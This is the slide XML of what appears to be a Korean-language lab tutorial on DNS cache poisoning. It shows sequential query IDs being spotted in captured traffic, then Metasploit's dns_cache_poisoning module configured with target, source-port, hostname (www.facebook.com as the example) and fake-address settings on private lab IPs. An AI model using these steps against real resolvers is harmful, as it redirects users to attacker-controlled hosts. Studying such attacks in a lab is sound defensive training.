                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>로 설정하면 웹 브라우저를 통해서도 확인 가능</a:t>
                      </a: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276630"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="_x199974960">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{037F0F4E-FE9F-4E9A-9A9F-26FD27468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499" y="1426246"/>
            <a:ext cx="4062413" cy="1530350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9217" name="_x199978400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1A59FE-E102-42CE-BDF0-606AA9718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311" y="3107644"/>
            <a:ext cx="4062413" cy="16652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_x197188112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C2799A-7CC5-4CAF-8175-B8D374BC7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886" y="1132703"/>
            <a:ext cx="5400675" cy="188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274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www.navy.mil.kr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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ www.navy.mil.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0xb8bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 보내는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 순차적으로 증가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격에 취약함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캐시 오염 공격을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격 모듈 사용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; use auxiliary/spoof/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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197188352">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E07DB87-EE7B-43FC-8A39-69DD32363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859"/>
            <a:ext cx="5400675" cy="1895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표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCDD0D74-68F9-436E-95DA-A938F7A60601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2433329681"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500180" y="3748510"/>
          <a:ext cx="5328158" cy="1224026"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3599208759"/>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379462"/>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순차적으로 증가하는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1980~90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임</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="165100" marR="0" indent="-16510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1990~2000</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>년대에 사용되었던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BIND8</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섞어서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(shuffle)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사용하거나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풀을 사용하는 옵션만 제공</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주로 사용되고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BIND9</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풀 사용만 가능</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181591"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5B04E0F-AB60-49B8-AD10-9ED6EDF20664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326415" y="768651"/>
            <a:ext cx="5321990" cy="2565258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76372707-B768-45DA-B4F0-1A727B8B4B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326415" y="4196565"/>
            <a:ext cx="3923308" cy="4162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30588627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공격 모듈의 옵션 확인</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show options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공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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RHOST 10.10.1.14</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서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소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SRCPORT 33333</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의를 보낼 때 사용하는 포트 번호</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오염 대상 호스트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HOSTNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>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NEWADDR 10.10.1.99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위에서 설정한 호스트의 가짜 주소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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답 설정</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SET BASEID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: BASEID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 획득한 마지막 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 사용하면 되며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수로 변환하여 입력해야 함</a:t>
            </a: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ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>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Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E8097B-8C3D-442B-8ED1-2581D6C7C4B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="915609"/>
            <a:ext cx="5400040" cy="1963166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="표 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A219C35E-2B5A-41E0-B9DE-21029DB24664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209942005"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500498" y="2994214"/>
          <a:ext cx="5327904" cy="1970024"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1129030">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2999008096"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2854198">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1789836265"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1344676">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1681651181"/>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설명</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예제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1585921"/>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BASEID</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시작 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>ID</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47295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154536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HOSTNAME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 이름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www.facebook.com</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17249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NEWADDR</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오염시킬 호스트의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938112"/>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RHOST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4320646"/>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SRCPORT</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공격 대상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질의 소스 포트</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156104"/>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UPDNS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상위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서버의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주소</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10.10.1.99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804968"/>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XIDS</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주입할 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>DNS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>응답의 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50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962063"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E26FD0EF-3009-4A90-B435-BDB0F900E760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899976" y="5871331"/>
            <a:ext cx="4528947" cy="377952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A99B5C-D928-4A0A-96BF-CF9A187E93DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6644524" y="920628"/>
            <a:ext cx="4693920" cy="350520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DB08161-BA26-4517-B8E0-D14C0116B4F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355930" y="2279044"/>
            <a:ext cx="5237480" cy="395605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7C0E58-0353-456E-ACDB-61AF1BF57C84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314517" y="3484743"/>
            <a:ext cx="5376985" cy="395604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E5C108-18AC-4D52-B6E8-E7368C80E379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
